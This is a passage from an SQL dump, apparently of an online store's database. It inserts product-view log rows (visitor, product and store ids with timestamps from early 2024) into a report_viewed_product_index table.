(9371, NULL, NULL, 2059, 1, '2024-01-28 05:16:16'),
(9372, NULL, NULL, 2064, 1, '2024-01-28 05:30:03'),
(9373, NULL, NULL, 2053, 1, '2024-01-28 07:06:15'),
(9374, NULL, NULL, 2054, 1, '2024-01-28 13:33:24'),
(9375, NULL, NULL, 2055, 1, '2024-01-28 13:40:38'),
(9376, NULL, NULL, 2064, 1, '2024-01-28 19:05:18'),
(9377, NULL, NULL, 2053, 1, '2024-01-28 20:29:31'),
(9378, NULL, NULL, 2059, 1, '2024-01-28 20:40:28'),
(9379, NULL, NULL, 2060, 1, '2024-01-29 02:44:02'),
(9380, NULL, NULL, 2064, 1, '2024-01-29 04:24:43'),
(9381, NULL, NULL, 2059, 1, '2024-01-29 04:51:18'),
(9382, NULL, NULL, 2059, 1, '2024-01-29 04:56:54'),
(9383, NULL, NULL, 2054, 1, '2024-01-29 05:08:23'),
(9384, NULL, NULL, 2053, 1, '2024-01-29 06:32:02'),
(9385, NULL, NULL, 2064, 1, '2024-01-29 09:09:18'),
(9386, NULL, NULL, 2061, 1, '2024-01-29 09:37:07'),
(9387, NULL, NULL, 2064, 1, '2024-01-29 11:27:28'),
(9388, NULL, NULL, 2055, 1, '2024-01-29 13:01:18'),
(9389, NULL, NULL, 2059, 1, '2024-01-29 14:06:11'),
(9390, NULL, NULL, 2064, 1, '2024-01-29 19:09:47'),
(9391, NULL, NULL, 2054, 1, '2024-01-29 19:48:54'),
(9392, NULL, NULL, 2053, 1, '2024-01-29 21:20:18'),
(9393, NULL, NULL, 2061, 1, '2024-01-29 21:54:04'),
(9394, NULL, NULL, 2061, 1, '2024-01-29 22:47:44'),
(9395, NULL, NULL, 2060, 1, '2024-01-30 01:04:55'),
(9396, NULL, NULL, 2061, 1, '2024-01-30 01:48:11'),
(9397, NULL, NULL, 2062, 1, '2024-01-30 03:05:40'),
(9398, NULL, NULL, 2059, 1, '2024-01-30 07:23:32'),
(9399, NULL, NULL, 2054, 1, '2024-01-30 07:36:31'),
(9400, NULL, NULL, 2055, 1, '2024-01-30 10:26:28'),
(9401, NULL, NULL, 2060, 1, '2024-01-30 11:52:36'),
(9402, NULL, NULL, 2064, 1, '2024-01-30 12:01:32'),
(9403, NULL, NULL, 2064, 1, '2024-01-30 12:39:20'),
(9404, NULL, NULL, 2055, 1, '2024-01-30 13:55:07'),
(9405, NULL, NULL, 2061, 1, '2024-01-30 13:57:18'),
(9406, NULL, NULL, 2061, 1, '2024-01-30 14:15:39'),
(9407, NULL, NULL, 2060, 1, '2024-01-30 17:09:52'),
(9408, NULL, NULL, 2060, 1, '2024-01-30 19:34:06'),
(9409, NULL, NULL, 2064, 1, '2024-01-30 20:30:07'),
(9410, NULL, NULL, 2059, 1, '2024-01-30 22:22:58'),
(9411, NULL, NULL, 2059, 1, '2024-01-30 23:00:26'),
(9412, NULL, NULL, 2054, 1, '2024-01-30 23:03:19'),
(9413, NULL, NULL, 2055, 1, '2024-01-30 23:14:58'),
(9414, NULL, NULL, 2061, 1, '2024-01-31 01:01:19'),
(9415, NULL, NULL, 2053, 1, '2024-01-31 03:34:31'),
(9416, NULL, NULL, 2060, 1, '2024-01-31 03:38:18'),
(9417, NULL, NULL, 2063, 1, '2024-01-31 04:06:34'),
(9418, NULL, NULL, 2059, 1, '2024-01-31 04:22:25'),
(9419, NULL, NULL, 2055, 1, '2024-01-31 07:01:47'),
(9420, NULL, NULL, 2059, 1, '2024-01-31 07:13:10'),
(9421, NULL, NULL, 2054, 1, '2024-01-31 07:16:40'),
(9422, NULL, NULL, 2060, 1, '2024-01-31 10:08:12'),
(9423, NULL, NULL, 2055, 1, '2024-01-31 10:26:30'),
(9424, NULL, NULL, 2060, 1, '2024-01-31 10:44:17'),
(9425, NULL, NULL, 2055, 1, '2024-01-31 10:44:20'),
(9426, NULL, NULL, 2059, 1, '2024-01-31 10:44:27'),
(9427, NULL, NULL, 2058, 1, '2024-01-31 10:44:31'),
(9428, NULL, NULL, 2054, 1, '2024-01-31 10:44:36'),
(9429, NULL, NULL, 2064, 1, '2024-01-31 10:44:39'),
(9430, NULL, NULL, 2063, 1, '2024-01-31 10:44:43'),
(9431, NULL, NULL, 2062, 1, '2024-01-31 10:44:48'),
(9432, NULL, NULL, 2061, 1, '2024-01-31 10:44:51'),
(9433, NULL, NULL, 2062, 1, '2024-01-31 10:59:21'),
(9434, NULL, NULL, 2054, 1, '2024-01-31 15:07:29'),
(9435, NULL, NULL, 2054, 1, '2024-01-31 17:33:59'),
(9436, NULL, NULL, 2054, 1, '2024-01-31 18:16:43'),
(9437, NULL, NULL, 2061, 1, '2024-01-31 18:43:57'),
(9438, NULL, NULL, 2064, 1, '2024-01-31 20:41:26'),
(9439, NULL, NULL, 2055, 1, '2024-02-01 03:54:25'),
(9440, NULL, NULL, 2063, 1, '2024-02-01 06:59:34'),
(9441, NULL, NULL, 2063, 1, '2024-02-01 07:43:40'),
(9442, NULL, NULL, 2060, 1, '2024-02-01 10:25:52'),
(9443, NULL, NULL, 2063, 1, '2024-02-01 11:13:51'),
(9444, NULL, NULL, 2058, 1, '2024-02-01 16:41:32'),
(9445, NULL, NULL, 2064, 1, '2024-02-01 18:09:16'),
(9446, NULL, NULL, 2064, 1, '2024-02-01 18:09:28'),
(9447, NULL, NULL, 2062, 1, '2024-02-01 18:10:44'),
(9448, NULL, NULL, 2062, 1, '2024-02-01 18:10:49'),
(9449, NULL, NULL, 2053, 1, '2024-02-01 18:11:20'),
(9450, NULL, NULL, 2063, 1, '2024-02-01 18:12:40'),
(9451, NULL, NULL, 2063, 1, '2024-02-01 18:12:52'),
(9452, NULL, NULL, 2061, 1, '2024-02-01 18:12:56'),
(9453, NULL, NULL, 2061, 1, '2024-02-01 18:13:00'),
(9454, NULL, NULL, 2059, 1, '2024-02-01 18:13:12'),
(9455, NULL, NULL, 2059, 1, '2024-02-01 18:13:17'),
(9456, NULL, NULL, 2058, 1, '2024-02-01 18:13:21'),
(9457, NULL, NULL, 2058, 1, '2024-02-01 18:14:15'),
(9458, NULL, NULL, 2055, 1, '2024-02-01 18:15:36'),
(9459, NULL, NULL, 2054, 1, '2024-02-01 18:15:45'),
(9460, NULL, NULL, 2055, 1, '2024-02-01 18:15:45'),
(9461, NULL, NULL, 2054, 1, '2024-02-01 18:15:48'),
(9462, NULL, NULL, 2060, 1, '2024-02-01 18:22:00'),
(9463, NULL, NULL, 2060, 1, '2024-02-01 18:22:04'),
(9464, NULL, NULL, 2061, 1, '2024-02-01 20:04:07'),
(9465, NULL, NULL, 2054, 1, '2024-02-01 21:06:14'),
(9466, NULL, NULL, 2059, 1, '2024-02-01 22:15:13'),
(9467, NULL, NULL, 2059, 1, '2024-02-01 22:15:13'),
(9468, NULL, NULL, 2064, 1, '2024-02-01 22:53:39'),
(9469, NULL, NULL, 2061, 1, '2024-02-01 23:27:34'),
(9470, NULL, NULL, 2054, 1, '2024-02-01 23:53:13'),
(9471, NULL, NULL, 2053, 1, '2024-02-02 01:26:18'),
(9472, NULL, NULL, 2061, 1, '2024-02-02 06:06:37'),
(9473, NULL, NULL, 2054, 1, '2024-02-02 10:42:12'),
(9474, NULL, NULL, 2060, 1, '2024-02-02 11:55:50'),
(9475, NULL, NULL, 2063, 1, '2024-02-02 11:55:52'),
(9476, NULL, NULL, 2058, 1, '2024-02-02 11:55:54'),
(9477, NULL, NULL, 2055, 1, '2024-02-02 11:55:57'),
(9478, NULL, NULL, 2061, 1, '2024-02-02 11:56:05'),
(9479, NULL, NULL, 2062, 1, '2024-02-02 11:56:08'),
(9480, NULL, NULL, 2054, 1, '2024-02-02 11:57:57'),
(9481, NULL, NULL, 2059, 1, '2024-02-02 11:58:45'),
(9482, NULL, NULL, 2064, 1, '2024-02-02 11:59:25'),
(9483, NULL, NULL, 2062, 1, '2024-02-02 16:03:15'),
(9484, NULL, NULL, 2061, 1, '2024-02-02 17:53:03'),
(9485, NULL, NULL, 2054, 1, '2024-02-02 18:30:49'),
(9486, NULL, NULL, 2053, 1, '2024-02-02 19:39:43'),
(9487, NULL, NULL, 2059, 1, '2024-02-03 01:35:04'),
(9488, NULL, NULL, 2062, 1, '2024-02-03 02:01:26'),
(9489, NULL, NULL, 2054, 1, '2024-02-03 05:23:38'),
(9490, NULL, NULL, 2060, 1, '2024-02-03 05:47:52'),
(9491, NULL, NULL, 2061, 1, '2024-02-03 10:47:51'),
(9492, NULL, NULL, 2064, 1, '2024-02-03 11:15:20'),
(9493, NULL, NULL, 2053, 1, '2024-02-03 11:17:13'),
(9494, NULL, NULL, 2059, 1, '2024-02-03 12:36:19'),
(9495, NULL, NULL, 2054, 1, '2024-02-03 13:03:11'),
(9496, NULL, NULL, 2060, 1, '2024-02-03 13:15:08'),
(9497, NULL, NULL, 2064, 1, '2024-02-03 16:44:57'),
(9498, NULL, NULL, 2061, 1, '2024-02-03 16:56:23'),
(9499, NULL, NULL, 2059, 1, '2024-02-03 17:27:31'),
(9500, NULL, NULL, 2058, 1, '2024-02-03 17:45:46'),
(9501, NULL, NULL, 2053, 1, '2024-02-03 19:01:28'),
(9502, NULL, NULL, 2064, 1, '2024-02-03 19:01:30'),
(9503, NULL, NULL, 2059, 1, '2024-02-04 02:24:07'),
(9504, NULL, NULL, 2061, 1, '2024-02-04 04:16:11'),
(9505, NULL, NULL, 2060, 1, '2024-02-04 04:19:30'),
(9506, NULL, NULL, 2064, 1, '2024-02-04 05:47:20'),
(9507, NULL, NULL, 2053, 1, '2024-02-04 06:32:13'),
(9508, NULL, NULL, 2055, 1, '2024-02-04 06:55:12'),
(9509, NULL, NULL, 2054, 1, '2024-02-04 07:01:49'),
(9510, NULL, NULL, 2054, 1, '2024-02-04 07:02:18'),
(9511, NULL, NULL, 2059, 1, '2024-02-04 07:02:32'),
(9512, NULL, NULL, 2061, 1, '2024-02-04 07:02:41'),
(9513, NULL, NULL, 2058, 1, '2024-02-04 07:02:52'),
(9514, NULL, NULL, 2055, 1, '2024-02-04 14:08:57'),
(9515, NULL, NULL, 2053, 1, '2024-02-04 14:09:09'),
(9516, NULL, NULL, 2060, 1, '2024-02-04 14:09:13'),
(9517, NULL, NULL, 2062, 1, '2024-02-04 14:09:15'),
(9518, NULL, NULL, 2063, 1, '2024-02-04 14:09:18'),
(9519, NULL, NULL, 2054, 1, '2024-02-04 14:09:21'),
(9520, NULL, NULL, 2058, 1, '2024-02-04 14:09:22'),
(9521, NULL, NULL, 2064, 1, '2024-02-04 14:09:25'),
(9522, NULL, NULL, 2059, 1, '2024-02-04 14:09:32'),
(9523, NULL, NULL, 2064, 1, '2024-02-04 16:55:57'),
(9524, NULL, NULL, 2055, 1, '2024-02-04 17:01:53'),
(9525, NULL, NULL, 2064, 1, '2024-02-04 18:38:22'),
(9526, NULL, NULL, 2053, 1, '2024-02-04 19:07:47'),
(9527, NULL, NULL, 2059, 1, '2024-02-04 21:29:04'),
(9528, NULL, NULL, 2055, 1, '2024-02-04 22:21:11'),
(9529, NULL, NULL, 2064, 1, '2024-02-04 22:21:11'),
(9530, NULL, NULL, 2054, 1, '2024-02-04 22:21:11'),
(9531, NULL, NULL, 2058, 1, '2024-02-05 02:17:45'),
(9532, NULL, NULL, 2059, 1, '2024-02-05 04:21:23'),
(9533, NULL, NULL, 2061, 1, '2024-02-05 04:35:45'),
(9534, NULL, NULL, 2059, 1, '2024-02-05 05:21:15'),
(9535, NULL, NULL, 2053, 1, '2024-02-05 06:50:58'),
(9536, NULL, NULL, 2055, 1, '2024-02-05 08:40:20'),
(9537, NULL, NULL, 2060, 1, '2024-02-05 10:33:02'),
(9538, NULL, NULL, 2053, 1, '2024-02-05 10:46:15'),
(9539, NULL, NULL, 2059, 1, '2024-02-05 13:03:09'),
(9540, NULL, NULL, 2062, 1, '2024-02-05 14:29:10'),
(9541, NULL, NULL, 2062, 1, '2024-02-05 14:31:00'),
(9542, NULL, NULL, 2055, 1, '2024-02-05 17:36:16'),
(9543, NULL, NULL, 2053, 1, '2024-02-05 17:46:51'),
(9544, NULL, NULL, 2060, 1, '2024-02-05 18:02:18'),
(9545, NULL, NULL, 2063, 1, '2024-02-05 18:21:31'),
(9546, NULL, NULL, 2058, 1, '2024-02-05 19:09:39'),
(9547, NULL, NULL, 2055, 1, '2024-02-05 20:43:45'),
(9548, NULL, NULL, 2053, 1, '2024-02-05 23:05:14'),
(9549, NULL, NULL, 2061, 1, '2024-02-05 23:24:26'),
(9550, NULL, NULL, 2062, 1, '2024-02-06 00:38:01'),
(9551, NULL, NULL, 2062, 1, '2024-02-06 00:49:45'),
(9552, NULL, NULL, 2054, 1, '2024-02-06 03:30:20'),
(9553, NULL, NULL, 2061, 1, '2024-02-06 04:03:22'),
(9554, NULL, NULL, 2059, 1, '2024-02-06 04:07:39'),
(9555, NULL, NULL, 2064, 1, '2024-02-06 04:39:44'),
(9556, NULL, NULL, 2055, 1, '2024-02-06 05:10:52'),
(9557, NULL, NULL, 2064, 1, '2024-02-06 05:11:09'),
(9558, NULL, NULL, 2061, 1, '2024-02-06 05:11:23'),
(9559, NULL, NULL, 2058, 1, '2024-02-06 05:11:45'),
(9560, NULL, NULL, 2059, 1, '2024-02-06 05:57:57'),
(9561, NULL, NULL, 2054, 1, '2024-02-06 07:13:56'),
(9562, NULL, NULL, 2053, 1, '2024-02-06 08:03:15'),
(9563, NULL, NULL, 2054, 1, '2024-02-06 10:13:26'),
(9564, NULL, NULL, 2053, 1, '2024-02-06 19:43:21'),
(9565, NULL, NULL, 2061, 1, '2024-02-06 19:59:51'),
(9566, NULL, NULL, 2061, 1, '2024-02-06 20:00:05'),
(9567, NULL, NULL, 2064, 1, '2024-02-07 02:03:56'),
(9568, NULL, NULL, 2054, 1, '2024-02-07 02:34:27'),
(9569, NULL, NULL, 2064, 1, '2024-02-07 08:38:45'),
(9570, NULL, NULL, 2064, 1, '2024-02-07 08:38:52'),
(9571, NULL, NULL, 2059, 1, '2024-02-07 08:56:52'),
(9572, NULL, NULL, 2060, 1, '2024-02-07 10:38:59'),
(9573, NULL, NULL, 2053, 1, '2024-02-07 11:11:55'),
(9574, NULL, NULL, 2054, 1, '2024-02-07 14:14:58'),
(9575, NULL, NULL, 2064, 1, '2024-02-07 16:39:04'),
(9576, NULL, NULL, 2053, 1, '2024-02-07 19:32:57'),
(9577, NULL, NULL, 2058, 1, '2024-02-07 22:36:48'),
(9578, NULL, NULL, 2054, 1, '2024-02-08 00:47:17'),
(9579, NULL, NULL, 2053, 1, '2024-02-08 04:36:06'),
(9580, NULL, NULL, 2059, 1, '2024-02-08 06:43:48'),
(9581, NULL, NULL, 2064, 1, '2024-02-08 08:28:03'),
(9582, NULL, NULL, 2054, 1, '2024-02-08 09:10:03'),
(9583, NULL, NULL, 2064, 1, '2024-02-08 14:17:39'),
(9584, NULL, NULL, 2054, 1, '2024-02-08 17:06:29'),
(9585, NULL, NULL, 2064, 1, '2024-02-08 17:43:56'),
(9586, NULL, NULL, 2060, 1, '2024-02-08 19:13:34'),
(9587, NULL, NULL, 2053, 1, '2024-02-08 19:27:35'),
(9588, NULL, NULL, 2063, 1, '2024-02-08 22:45:11'),
(9589, NULL, NULL, 2061, 1, '2024-02-09 03:26:13'),
(9590, NULL, NULL, 2054, 1, '2024-02-09 06:28:26'),
(9591, NULL, NULL, 2064, 1, '2024-02-09 06:59:05'),
(9592, NULL, NULL, 2053, 1, '2024-02-09 10:48:11'),
(9593, NULL, NULL, 2063, 1, '2024-02-09 15:10:55'),
(9594, NULL, NULL, 2064, 1, '2024-02-09 15:51:53'),
(9595, NULL, NULL, 2053, 1, '2024-02-09 18:38:03'),
(9596, NULL, NULL, 2054, 1, '2024-02-09 19:27:45'),
(9597, NULL, NULL, 2053, 1, '2024-02-10 05:36:05'),
(9598, NULL, NULL, 2054, 1, '2024-02-10 06:23:24'),
(9599, NULL, NULL, 2060, 1, '2024-02-10 13:08:06'),
(9600, NULL, NULL, 2053, 1, '2024-02-10 13:08:08'),
(9601, NULL, NULL, 2060, 1, '2024-02-10 13:20:42'),
(9602, NULL, NULL, 2063, 1, '2024-02-10 13:31:47'),
(9603, NULL, NULL, 2059, 1, '2024-02-10 14:10:31'),
(9604, NULL, NULL, 2054, 1, '2024-02-10 14:57:59'),
(9605, NULL, NULL, 2059, 1, '2024-02-10 16:45:55'),
(9606, NULL, NULL, 2064, 1, '2024-02-10 20:21:22'),
(9607, NULL, NULL, 2053, 1, '2024-02-11 01:38:35'),
(9608, NULL, NULL, 2059, 1, '2024-02-11 02:26:53'),
(9609, NULL, NULL, 2054, 1, '2024-02-11 03:34:16'),
(9610, NULL, NULL, 2064, 1, '2024-02-11 06:37:39'),
(9611, NULL, NULL, 2062, 1, '2024-02-11 10:25:53'),
(9612, NULL, NULL, 2053, 1, '2024-02-11 13:14:30'),
(9613, NULL, NULL, 2064, 1, '2024-02-11 17:59:20'),
(9614, NULL, NULL, 2054, 1, '2024-02-11 19:14:18'),
(9615, NULL, NULL, 2064, 1, '2024-02-11 22:14:40'),
(9616, NULL, NULL, 2064, 1, '2024-02-12 02:09:14'),
(9617, NULL, NULL, 2054, 1, '2024-02-12 03:10:48'),
(9618, NULL, NULL, 2059, 1, '2024-02-12 03:18:54'),
(9619, NULL, NULL, 2064, 1, '2024-02-12 04:30:23'),
(9620, NULL, NULL, 2060, 1, '2024-02-12 05:47:46'),
(9621, NULL, NULL, 2059, 1, '2024-02-12 06:10:09'),
(9622, NULL, NULL, 2059, 1, '2024-02-12 06:10:11'),
(9623, NULL, NULL, 2060, 1, '2024-02-12 06:39:19'),
(9624, NULL, NULL, 2060, 1, '2024-02-12 07:09:45'),
(9625, NULL, NULL, 2053, 1, '2024-02-12 07:30:49'),
(9626, NULL, NULL, 2058, 1, '2024-02-12 07:50:07'),
(9627, NULL, NULL, 2063, 1, '2024-02-12 09:17:01'),
(9628, NULL, NULL, 2063, 1, '2024-02-12 09:17:17'),
(9629, NULL, NULL, 2058, 1, '2024-02-12 11:29:28'),
(9630, NULL, NULL, 2053, 1, '2024-02-12 15:09:05'),
(9631, NULL, NULL, 2064, 1, '2024-02-12 18:28:39'),
(9632, NULL, NULL, 2054, 1, '2024-02-12 19:36:16'),
(9633, NULL, NULL, 2064, 1, '2024-02-12 20:10:49'),
(9634, NULL, NULL, 2053, 1, '2024-02-13 08:10:51'),
(9635, NULL, NULL, 2064, 1, '2024-02-13 08:39:01'),
(9636, NULL, NULL, 2054, 1, '2024-02-13 09:21:21'),
(9637, NULL, NULL, 2062, 1, '2024-02-13 09:39:12'),
(9638, NULL, NULL, 2054, 1, '2024-02-13 09:55:28'),
(9639, NULL, NULL, 2058, 1, '2024-02-13 13:22:55'),
(9640, NULL, NULL, 2060, 1, '2024-02-13 14:35:55');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(9641, NULL, NULL, 2063, 1, '2024-02-13 14:45:50'),
(9642, NULL, NULL, 2058, 1, '2024-02-13 15:08:17'),
(9643, NULL, NULL, 2055, 1, '2024-02-13 15:50:27'),
(9644, NULL, NULL, 2061, 1, '2024-02-13 17:05:06'),
(9645, NULL, NULL, 2062, 1, '2024-02-13 17:42:43'),
(9646, NULL, NULL, 2054, 1, '2024-02-13 18:53:47'),
(9647, NULL, NULL, 2059, 1, '2024-02-13 19:08:56'),
(9648, NULL, NULL, 2064, 1, '2024-02-13 19:21:14'),
(9649, NULL, NULL, 2060, 1, '2024-02-13 21:43:05'),
(9650, NULL, NULL, 2063, 1, '2024-02-13 21:53:53'),
(9651, NULL, NULL, 2058, 1, '2024-02-13 22:17:31'),
(9652, NULL, NULL, 2055, 1, '2024-02-13 23:04:15'),
(9653, NULL, NULL, 2064, 1, '2024-02-13 23:46:54'),
(9654, NULL, NULL, 2054, 1, '2024-02-14 00:09:28'),
(9655, NULL, NULL, 2060, 1, '2024-02-14 00:53:52'),
(9656, NULL, NULL, 2063, 1, '2024-02-14 01:03:29'),
(9657, NULL, NULL, 2058, 1, '2024-02-14 01:26:11'),
(9658, NULL, NULL, 2055, 1, '2024-02-14 02:15:10'),
(9659, NULL, NULL, 2061, 1, '2024-02-14 03:38:49'),
(9660, NULL, NULL, 2062, 1, '2024-02-14 04:20:58'),
(9661, NULL, NULL, 2060, 1, '2024-02-14 05:09:26'),
(9662, NULL, NULL, 2054, 1, '2024-02-14 05:43:54'),
(9663, NULL, NULL, 2059, 1, '2024-02-14 06:01:23'),
(9664, NULL, NULL, 2064, 1, '2024-02-14 06:15:31'),
(9665, NULL, NULL, 2055, 1, '2024-02-14 06:57:06'),
(9666, NULL, NULL, 2058, 1, '2024-02-14 08:24:09'),
(9667, 1968, NULL, 2061, 1, '2024-02-14 08:24:27'),
(9668, 1968, NULL, 2059, 1, '2024-02-14 08:24:47'),
(9669, NULL, NULL, 2053, 1, '2024-02-14 08:24:52'),
(9670, 1968, NULL, 2060, 1, '2024-02-14 08:25:16'),
(9671, 1968, NULL, 2062, 1, '2024-02-14 08:25:25'),
(9672, 1968, NULL, 2063, 1, '2024-02-14 08:26:03'),
(9673, 1968, NULL, 2064, 1, '2024-02-14 08:26:13'),
(9674, 1968, NULL, 2055, 1, '2024-02-14 08:26:33'),
(9675, 1968, NULL, 2054, 1, '2024-02-14 08:26:54'),
(9676, NULL, NULL, 2061, 1, '2024-02-14 08:43:38'),
(9677, NULL, NULL, 2061, 1, '2024-02-14 08:43:39'),
(9678, NULL, NULL, 2064, 1, '2024-02-14 08:58:51'),
(9679, NULL, NULL, 2061, 1, '2024-02-14 09:10:28'),
(9680, NULL, NULL, 2053, 1, '2024-02-14 11:21:19'),
(9681, NULL, NULL, 2054, 1, '2024-02-14 12:04:10'),
(9682, NULL, NULL, 2054, 1, '2024-02-14 12:44:32'),
(9683, NULL, NULL, 2062, 1, '2024-02-14 16:19:09'),
(9684, NULL, NULL, 2064, 1, '2024-02-14 18:31:39'),
(9685, NULL, NULL, 2053, 1, '2024-02-14 19:42:09'),
(9686, NULL, NULL, 2054, 1, '2024-02-14 19:44:02'),
(9687, NULL, NULL, 2054, 1, '2024-02-14 22:12:12'),
(9688, NULL, NULL, 2061, 1, '2024-02-15 02:16:26'),
(9689, NULL, NULL, 2064, 1, '2024-02-15 03:13:16'),
(9690, NULL, NULL, 2058, 1, '2024-02-15 03:42:31'),
(9691, NULL, NULL, 2053, 1, '2024-02-15 05:58:10'),
(9692, NULL, NULL, 2063, 1, '2024-02-15 06:50:15'),
(9693, NULL, NULL, 2054, 1, '2024-02-15 09:14:46'),
(9694, NULL, NULL, 2064, 1, '2024-02-15 13:14:04'),
(9695, NULL, NULL, 2053, 1, '2024-02-15 13:41:31'),
(9696, NULL, NULL, 2064, 1, '2024-02-15 16:12:14'),
(9697, NULL, NULL, 2054, 1, '2024-02-15 17:53:14'),
(9698, NULL, NULL, 2059, 1, '2024-02-15 19:11:06'),
(9699, NULL, NULL, 2058, 1, '2024-02-16 05:26:37'),
(9700, NULL, NULL, 2061, 1, '2024-02-16 05:27:48'),
(9701, NULL, NULL, 2059, 1, '2024-02-16 05:28:00'),
(9702, NULL, NULL, 2060, 1, '2024-02-16 05:28:09'),
(9703, NULL, NULL, 2062, 1, '2024-02-16 05:28:18'),
(9704, NULL, NULL, 2063, 1, '2024-02-16 05:28:27'),
(9705, NULL, NULL, 2064, 1, '2024-02-16 05:28:33'),
(9706, NULL, NULL, 2055, 1, '2024-02-16 05:29:14'),
(9707, NULL, NULL, 2054, 1, '2024-02-16 05:29:18'),
(9708, NULL, NULL, 2053, 1, '2024-02-16 05:29:22'),
(9709, NULL, NULL, 2058, 1, '2024-02-16 06:23:50'),
(9710, NULL, NULL, 2061, 1, '2024-02-16 06:23:54'),
(9711, NULL, NULL, 2059, 1, '2024-02-16 06:23:58'),
(9712, NULL, NULL, 2060, 1, '2024-02-16 06:24:02'),
(9713, NULL, NULL, 2062, 1, '2024-02-16 06:24:06'),
(9714, NULL, NULL, 2063, 1, '2024-02-16 06:24:10'),
(9715, NULL, NULL, 2064, 1, '2024-02-16 06:24:13'),
(9716, NULL, NULL, 2055, 1, '2024-02-16 06:25:43'),
(9717, NULL, NULL, 2054, 1, '2024-02-16 06:26:00'),
(9718, NULL, NULL, 2053, 1, '2024-02-16 06:26:13'),
(9719, NULL, NULL, 2064, 1, '2024-02-16 06:28:32'),
(9720, NULL, NULL, 2053, 1, '2024-02-16 09:53:12'),
(9721, NULL, NULL, 2054, 1, '2024-02-16 11:33:28'),
(9722, NULL, NULL, 2061, 1, '2024-02-16 13:20:32'),
(9723, NULL, NULL, 2064, 1, '2024-02-16 15:41:28'),
(9724, NULL, NULL, 2053, 1, '2024-02-16 18:54:50'),
(9725, NULL, NULL, 2054, 1, '2024-02-16 19:10:43'),
(9726, NULL, NULL, 2063, 1, '2024-02-16 19:21:29'),
(9727, NULL, NULL, 2064, 1, '2024-02-17 01:41:22'),
(9728, NULL, NULL, 2054, 1, '2024-02-17 03:16:01'),
(9729, NULL, NULL, 2053, 1, '2024-02-17 09:35:31'),
(9730, NULL, NULL, 2064, 1, '2024-02-17 13:17:49'),
(9731, NULL, NULL, 2054, 1, '2024-02-17 15:32:26'),
(9732, NULL, NULL, 2053, 1, '2024-02-17 17:13:24'),
(9733, NULL, NULL, 2064, 1, '2024-02-18 01:58:02'),
(9734, NULL, NULL, 2054, 1, '2024-02-18 07:12:54'),
(9735, NULL, NULL, 2061, 1, '2024-02-18 08:23:35'),
(9736, NULL, NULL, 2059, 1, '2024-02-18 11:24:53'),
(9737, NULL, NULL, 2059, 1, '2024-02-18 11:24:54'),
(9738, NULL, NULL, 2059, 1, '2024-02-18 11:24:55'),
(9739, NULL, NULL, 2053, 1, '2024-02-18 12:34:20'),
(9740, NULL, NULL, 2055, 1, '2024-02-18 15:43:31'),
(9741, NULL, NULL, 2061, 1, '2024-02-18 18:11:39'),
(9742, NULL, NULL, 2061, 1, '2024-02-18 18:12:14'),
(9743, NULL, NULL, 2053, 1, '2024-02-18 20:50:34'),
(9744, NULL, NULL, 2054, 1, '2024-02-18 21:00:32'),
(9745, NULL, NULL, 2064, 1, '2024-02-18 22:09:28'),
(9746, NULL, NULL, 2062, 1, '2024-02-18 23:33:54'),
(9747, NULL, NULL, 2064, 1, '2024-02-19 05:43:44'),
(9748, NULL, NULL, 2053, 1, '2024-02-19 07:06:16'),
(9749, NULL, NULL, 2054, 1, '2024-02-19 07:29:22'),
(9750, NULL, NULL, 2053, 1, '2024-02-19 14:59:02'),
(9751, NULL, NULL, 2064, 1, '2024-02-19 16:17:36'),
(9752, NULL, NULL, 2054, 1, '2024-02-19 19:12:24'),
(9753, NULL, NULL, 2064, 1, '2024-02-19 19:26:14'),
(9754, NULL, NULL, 2063, 1, '2024-02-19 22:42:03'),
(9755, NULL, NULL, 2064, 1, '2024-02-19 23:06:30'),
(9756, NULL, NULL, 2053, 1, '2024-02-20 01:14:13'),
(9757, NULL, NULL, 2058, 1, '2024-02-20 02:04:47'),
(9758, NULL, NULL, 2064, 1, '2024-02-20 02:05:00'),
(9759, NULL, NULL, 2054, 1, '2024-02-20 02:05:12'),
(9760, NULL, NULL, 2062, 1, '2024-02-20 02:05:14'),
(9761, NULL, NULL, 2055, 1, '2024-02-20 02:05:16'),
(9762, NULL, NULL, 2059, 1, '2024-02-20 02:05:25'),
(9763, NULL, NULL, 2063, 1, '2024-02-20 02:05:28'),
(9764, NULL, NULL, 2061, 1, '2024-02-20 02:05:31'),
(9765, NULL, NULL, 2060, 1, '2024-02-20 02:05:36'),
(9766, NULL, NULL, 2058, 1, '2024-02-20 02:06:00'),
(9767, NULL, NULL, 2064, 1, '2024-02-20 02:06:08'),
(9768, NULL, NULL, 2062, 1, '2024-02-20 02:06:21'),
(9769, NULL, NULL, 2055, 1, '2024-02-20 02:06:23'),
(9770, NULL, NULL, 2059, 1, '2024-02-20 02:06:30'),
(9771, NULL, NULL, 2063, 1, '2024-02-20 02:06:33'),
(9772, NULL, NULL, 2054, 1, '2024-02-20 02:06:36'),
(9773, NULL, NULL, 2061, 1, '2024-02-20 02:06:39'),
(9774, NULL, NULL, 2060, 1, '2024-02-20 02:06:45'),
(9775, NULL, NULL, 2053, 1, '2024-02-20 02:06:58'),
(9776, NULL, NULL, 2064, 1, '2024-02-20 07:06:24'),
(9777, NULL, NULL, 2061, 1, '2024-02-20 08:35:20'),
(9778, NULL, NULL, 2061, 1, '2024-02-20 08:35:23'),
(9779, NULL, NULL, 2053, 1, '2024-02-20 13:14:21'),
(9780, NULL, NULL, 2059, 1, '2024-02-20 15:29:09'),
(9781, NULL, NULL, 2054, 1, '2024-02-20 15:43:38'),
(9782, NULL, NULL, 2058, 1, '2024-02-20 21:48:20'),
(9783, NULL, NULL, 2053, 1, '2024-02-21 01:22:25'),
(9784, NULL, NULL, 2064, 1, '2024-02-21 01:58:51'),
(9785, NULL, NULL, 2061, 1, '2024-02-21 12:31:49'),
(9786, NULL, NULL, 2061, 1, '2024-02-21 12:32:07'),
(9787, NULL, NULL, 2053, 1, '2024-02-21 13:15:02'),
(9788, NULL, NULL, 2064, 1, '2024-02-21 17:25:53'),
(9789, NULL, NULL, 2060, 1, '2024-02-21 19:20:44'),
(9790, NULL, NULL, 2060, 1, '2024-02-21 19:24:51'),
(9791, NULL, NULL, 2060, 1, '2024-02-21 20:08:05'),
(9792, NULL, NULL, 2062, 1, '2024-02-21 21:29:32'),
(9793, NULL, NULL, 2053, 1, '2024-02-22 01:15:27'),
(9794, NULL, NULL, 2059, 1, '2024-02-22 03:33:59'),
(9795, NULL, NULL, 2064, 1, '2024-02-22 04:49:20'),
(9796, NULL, NULL, 2062, 1, '2024-02-22 05:29:21'),
